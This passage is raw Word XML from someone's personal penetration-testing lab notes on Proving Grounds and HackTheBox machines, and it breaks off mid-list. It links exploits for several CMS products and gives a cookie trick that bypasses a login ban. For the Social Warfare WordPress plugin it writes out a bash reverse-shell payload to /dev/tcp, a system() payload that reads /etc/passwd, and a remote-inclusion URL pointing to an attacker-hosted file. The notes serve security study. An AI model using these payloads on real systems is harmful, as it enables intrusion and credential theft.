    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2xzhkfx63yq2" w:id="543"/>
      <w:bookmarkEnd w:id="543"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Random stuff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="636"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to get a password from USB stick, look at Mirai HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="636"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Wpwn PG Play root.txt said to look inside of USB, so we searched for the directory named USB, and then the flag was inside that directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="636"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / type -d -name "USB" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="636"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get the error "su: must be run from a terminal" or something along those lines, then that means you need an interactive shell, like you need to upgrade your shell. So follow the upgrading reverse shell section to upgrade it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nagios XI (CMS) was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1290">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Monitoring</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play. It was version 5.6.0, but the write up used a version 5.6.0 exploit that worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1155"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1291">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/hadrian3689/nagiosxi_5.6.6/blob/main/exploit.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Koken (CMS) was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1292">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Photographer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG play. It was actually a pretty in-depth exploit, so I thought it would be good to include the walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E3">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Monstra CMS (version 3.0.4) was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1293">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Monster</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. And in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1294">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup, they ran into a login ban from trying too many passwords, and they found a solution using </w:t>
      </w:r>
      <w:hyperlink r:id="rId1295">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page. But basically, we can bypass this ban by adding another cookie </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">login_attempts=0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in any POST request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId1296">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">first writeup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a lot more in-depth and provides two really interesting attack vectors for Monstra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever decode something as an image (like in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1297">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Vegeta1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we decoded base64 twice and it was a PNG since it had a PNG header at the top), then you can just save it as an image (ex. .png) and then you can open it and see what it looks like</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E8">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Social Warfare v3.5.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Wordpress Plugin) or an even earlier version, then look at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1298">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SoSimple</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play for steps on how to exploit it using </w:t>
      </w:r>
      <w:hyperlink r:id="rId1299">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:hyperlink r:id="rId1300">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SoSimple</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> walkthrough shows us how to get a reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from it while the one above just enumerates until they found a id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;pre&gt;system("bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.45.197/443 0&gt;&amp;1'")&lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039EC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1301">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Wpwn</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1302">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's a simple explanation from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1303">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SoSimple</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  # &lt;pre&gt;system('cat /etc/passwd')&lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.187.78/wordpress//wp-admin/admin-post.php?swp_debug=load_options&amp;swp_url=http://192.168.45.208:80/test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also chain multiple commands like this to run one after the other:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;pre&gt; system('cd /home/; find . ') &lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F5">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
